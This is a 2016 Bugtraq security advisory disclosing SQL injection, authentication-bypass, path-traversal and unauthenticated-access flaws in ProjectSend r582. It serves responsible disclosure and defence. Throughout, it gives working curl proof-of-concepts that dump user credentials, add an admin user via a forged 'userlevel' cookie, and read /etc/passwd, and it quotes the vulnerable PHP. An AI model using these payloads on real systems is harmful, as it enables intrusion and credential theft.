'ProjectSend multiple vulnerabilities'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    ProjectSend multiple vulnerabilities
From:       Filippo Cavallarin <filippo.cavallarin () wearesegment ! com>
Date:       2016-01-29 11:59:15
Message-ID: D4976246-6CE9-40C1-8AD9-F3D57356B6DF () wearesegment ! com
[Download RAW message or body]

Advisory ID:  SGMA-16001
Title:  ProjectSend multiple vulnerabilities
Product:  ProjectSend (previously cFTP)
Version:  r582 and probably prior
Vendor:  www.projectsend.org
Vulnerability type:  SQL-injection, Auth bypass, Arbitrary File Access, Insecure \
Object Reference Risk level:  4 / 5
Credit:  filippo.cavallarin@wearesegment.com
CVE:  N/A
Vendor notification:  2015-11-05
Vendor fix:  N/A
Public disclosure:  2016-01-29


ProjectSend (previously cFTP) suffers from multiple vulnerabilities:


- SQL Injection

The script manage-files.php suffers from a SQL-Injection vulnerability because the \
request parameter "status" is used to build a sql query without beeing properly \
sanitized. In order to exploit this issue, an attaccker must be logged into the \
application as a non-privileged user. The following proof-of-concept demostrates this \
issue by downloading login credentials of registered users:

curl -X POST 'http://projectsend.local/manage-files.php?client_id=1' -H 'Cookie: \
PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22' --data "status=10' and 0 union select 0,1 ,'0) \
or 1 union select 0,1,concat(user,char(32),password),3,4,5,6,7,8,9 from tbl_users -- \
a',3,4,5,6,'7"



- SQL Injection

The script manage-files.php suffers from a SQL-Injection vulnerability because the \
request parameter "files" is used to build a sql query without beeing properly \
sanitized. In order to exploit this issue, an attaccker must be logged into the \
application as a non-privileged user. The following proof-of-concept demostrates this \
issue by injecting a SLEEP command into the database engine:

curl -X POST 'http://projectsend.local/manage-files.php' --data \
'files_actions=delete&do_action=&files%5B%5D=5) OR 1=sleep(10' -H 'Cookie: \
PHPSESSID=hiefdo3ra5hgmpa5mrpdfhih22'



- SQL Injection

The script clients.php suffers from a SQL-Injection vulnerability because the request \
parameter "selected_clients" is used to build a sql query without beeing properly \
sanitized. In order to exploit this issue, an attaccker must be logged into the \
application as a non-privileged user. There is no POC available, but the \
vulnerability is easy to spot by looking at the source code at line 63.

    $selected_clients = $_POST['selected_clients'];
    $clients_to_get = \
mysql_real_escape_string(implode(',',array_unique($selected_clients)));  $sql_user = \
$database->query("SELECT id, name FROM tbl_users WHERE id IN ($clients_to_get)");



- SQL Injection

The script clients.php suffers from a SQL-Injection vulnerability because the request \
parameter "status" is used to build a sql query without beeing properly sanitized. In \
order to exploit this issue, an attaccker must be logged into the application as a \
non-privileged user. There is no POC available, but the vulnerability is easy to spot \
by looking at the source code at line 146.

    $status_filter = $_POST['status'];
    $cq .= " AND active='$status_filter'";
    [...]
    $sql = $database->query($cq);



- SQL Injection

The script process-zip-download.php suffers from a SQL-Injection vulnerability \
because the request parameter "file" is used to build a sql query without beeing \
properly sanitized. There is no POC available, but the vulnerability is easy to spot \
by looking at the source code.

    $files_to_zip = explode(',',substr($_GET['file'], 0, -1));
    [...]
    foreach ($files_to_zip as $file_to_zip) {
    [...]
    $sql_url = $database->query('SELECT id, expires, expiry_date FROM tbl_files WHERE \
url="' . $file_to_zip .'"');



- SQL Injection

The script home-log.php suffers from a SQL-Injection vulnerability because the \
request parameter "action" is used to build a sql query without beeing properly \
sanitized. There is no POC available, but the vulnerability is easy to spot by \
looking at the source code.

    $log_action = $_GET['action'];
    $log_query = "SELECT * FROM tbl_actions_log";
    if (!empty($log_action)) {
        $log_query .= " WHERE action = '$log_action'";



- Authentication Bypass

An Authenticaton Bypass vulnerability has been discovered in multiple pages.
By adding a cookie to request it is possible to bypass certain authentication checks \
and gain access to protected resources.
The following proof-of-concepts are available:

Lists all registered users:
curl http://projectsend.local/users.php -H 'Cookie: userlevel=9'

Add an Admin user to the database:
curl http://projectsend.local/users-add.php -H 'Cookie: userlevel=9' -X POST --data \
'add_user_form_name=necci&add_user_form_email=poplix@papuasia.org&add_user_form_level=9&add_user_form_user=necci&add_user_form_active=1&add_user_form_pass=123456'


Read file statsictics:
curl http://projectsend.local/home.php -H 'Cookie: userlevel=9'

Read file details:
curl http://projectsend.local/edit-file.php?file_id=1 -H 'Cookie: userlevel=9'

Bypass authentication:
curl  'http://projectsend.local/process-zip-download.php' -H 'Cookie: userlevel=8'


- Arbitrary File Download

The page process-zip-download.php fails to restrict access to local files.
By injecting a path traversal vector into the "file" parameter it is possible to read \
an arbitrary file from the server.
By combining this vulnerability with the Authentication Bypass affecting the same \
file, is possible for a non-authenticated user to gain access to protected data.
The followinf proof-of-concept is available.

curl  'http://projectsend.local/process-zip-download.php?file=../../../../../../../../etc/passwdd' \
-H 'Cookie: userlevel=8' > ttt.zip



- Insecure Direct Object References

The page actions.log.export.php fails to perform authentication checks so it's \
possible for anyone to access logs data.
The followinf proof-of-concept is available.

curl http://projectsend.local/includes/actions.log.export.php




Solution
No solution is available at the time of writing.
The vendor has been contacted about three months before the public disclosure, but he \
stopped r esponding after we sent him our report.




References
https://www.wearesegment.com/research/Projectsend_multiple_vulnerabilities
http://www.projectsend.org




Filippo Cavallarin
https://wearesegment.com


["signature.asc" (signature.asc)]

-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - https://gpgtools.org

iQIcBAEBCgAGBQJWq1QTAAoJENKaW7brYyGorZMP/As/QyMhfpETNk/Ipb+AXNZh
yhKeaNidJelY7KE6tBj5AMb3vYlH7K7IJCbno8JPUh7QLWrQEa6GOb71XP1aCoJH
AlH4bTGL75R4KYiXwjllmI5GA1vWbQ3m+XPb3wKknx6A2fmpe5EYvnkIynvKL9X7
gXzQr1RyNtzmk4xpblZZKRtQfrPCwCHTIpBagQ5JtXuMndb2zn6eOuq22LJWBH5h
2qUjSKNdiDFSvru3VxeiH/hh6LXdPFP1xQOQ0Ap8PcAxMiauj40NI3IhAXGl0QI5
2ly3I3yu7WeLGCz+xqzWaQkfXvN1Fh2UpujaM+roo/DgxoPHfwnYnpK9UU1lfxwA
jeov0UY3sW8nn/4+fZM6DTz0Cl6oM/3lHJhP2C0cIVTtBXH9A+iOIXuBYHPT3H1+
zAnXMdLq+Y9QBBZ9OMYnFp+bhruEnHU5yP7SQ7cW5v4Q5UMwMglj8WjvHIUaFrYG
im9tMy1G5cGpmKX/+q8Vfmvsys7LHozcUF2zcCJCJlvGDXA/kOj+Wagr2c3oTntm
InDSbbSxM1MySdTOvDH5FKXw/uM/9uW4EDIB+v1h77C67t++/hnsrLIzMdCGWX5L
KWXvKZ/x+YikiMn1GhNdUOsh1WMzGU8hmWpnvd7iO7oW0SIIXLI1858Z7up/KQvY
pFeVDZTGavH4GX3XmYs4
=DE8c
-----END PGP SIGNATURE-----


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic